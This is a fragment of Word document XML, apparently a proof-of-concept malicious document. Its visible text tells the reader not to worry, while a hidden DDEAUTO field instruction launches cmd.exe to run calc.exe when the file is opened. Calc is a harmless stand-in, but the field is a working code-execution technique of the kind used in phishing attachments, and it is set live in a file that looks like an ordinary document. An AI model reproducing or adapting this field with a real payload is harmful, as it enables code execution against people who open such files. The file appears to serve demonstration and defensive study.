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96A" w:rsidRDefault="007D377E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D377E">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>This is not something you should worry about sir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2773D" w:rsidRDefault="00D2773D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="007D377E" w:rsidRPr="007D377E" w:rsidRDefault="007D377E">
      <w:pPr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</w:instrText>
      </w:r>
      <w:r w:rsidRPr="007D377E">
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007D377E" w:rsidRPr="007D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7E"/>
    <w:rsid w:val="002E2A22"/>
    <w:rsid w:val="004411F2"/>
    <w:rsid w:val="007D377E"/>
    <w:rsid w:val="00A6196A"/>
    <w:rsid w:val="00D2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D7DC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{18AAFED8-6002-42CA-BFCE-35903E2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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>mantvydas</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-14T14:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-14T15:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>